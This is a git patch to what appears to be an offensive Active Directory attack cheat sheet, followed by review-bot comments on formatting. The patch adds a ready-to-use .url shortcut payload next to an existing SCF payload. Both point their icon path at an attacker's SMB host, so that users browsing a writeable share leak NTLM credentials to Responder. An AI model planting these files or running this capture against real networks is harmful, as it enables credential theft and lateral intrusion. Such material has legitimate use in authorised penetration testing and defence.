From 639dc9faecfb1c682fb5b9d5fd6ad7885846b846 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 14 Nov 2019 23:54:57 +0100 Subject: [PATCH] .url file in writeable share --- .../Active Directory Attack.md | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 9bea0d9..57f9df3 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -264,9 +264,9 @@ smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw sudo mount -t cifs -o username=,password= ///Users folder ``` -### SCF file attack against writeable share +### SCF and URL file attack against writeable share -Drop the following `something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0` +Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0` ```powershell [Shell] @@ -276,6 +276,17 @@ IconFile=\\10.10.XX.XX\Share\test.ico Command=ToggleDesktop ``` +This attack also works with `.url` files and `responder -I eth0 -v`. + +```powershell +[InternetShortcut] +URL=whatever +WorkingDirectory=whatever +IconFile=\\192.168.1.29\%USERNAME%.icon +IconIndex=1 +``` + + ### GPO - Pivoting with Local Admin & Passwords in SYSVOL :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
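Review bot: The rename to `@something.scf` in the changed instruction line of the first hunk is not explained, so a reader cannot tell whether the `@` prefix is required or incidental; add a short clause stating what it is for. The heading change to `### SCF and URL file attack against writeable share` also alters the generated anchor, so any table of contents entry or cross-link that points at the old heading should be updated in the same commit.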
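Review bot: The new `.url` block in the second hunk is fenced as `powershell` although its content is an INI-style `[InternetShortcut]` file; use `ini` or an untagged fence so it is not read as a script, and give the file a name as the SCF paragraph does. The added sentence uses `responder -I eth0 -v` while the SCF paragraph uses `responder -wrf --lm -v -I eth0`; state why the flags differ or use one invocation for both. `IconFile=\\192.168.1.29\%USERNAME%.icon` hardcodes a lab address where the SCF example uses the placeholder `10.10.XX.XX`; align the two, and drop one of the two blank lines added before `### GPO - Pivoting with Local Admin & Passwords in SYSVOL`.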